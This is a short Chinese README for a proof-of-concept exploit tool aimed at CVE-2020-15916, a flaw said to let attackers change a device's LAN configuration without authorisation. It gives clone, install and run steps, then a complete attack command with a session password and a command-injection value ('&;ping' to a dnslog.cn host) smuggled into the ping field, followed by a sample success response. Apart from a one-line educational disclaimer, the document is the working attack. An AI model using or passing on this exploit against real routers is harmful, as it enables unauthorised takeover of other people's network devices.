GenLANConfigAttack - 是一个针对 CVE-2020-15916 漏洞的概念验证工具,该漏洞允许未经授权更改设备的 LAN 配置。
git clone https://github.com/geniuszly/CVE-2020-15916
pip install -r requirements.txt
python GenLANConfigAttack.py
target_ip: 目标设备的 IP 地址。ping_command: 在目标设备上执行的命令。session_password: 会话访问密码。python GenLANConfigAttack.py --target_ip 192.168.0.1 --session_password gew43t4gtewe4u5u576i7yhggerr6ijtr --ping_command '192.168.0.1 &;ping xt68nd.dnslog.cn'
[来自 192.168.0.1 的响应]:
{"success":true,"message":"LAN IP 配置已成功更新"}
此概念验证针对 CVE-2020-15916 漏洞,该漏洞通过利用弱身份验证机制,允许攻击者更改易受攻击设备的 LAN 配置。
此工具仅用于教育目的。请负责任地使用,并仅在获得明确许可的环境中使用。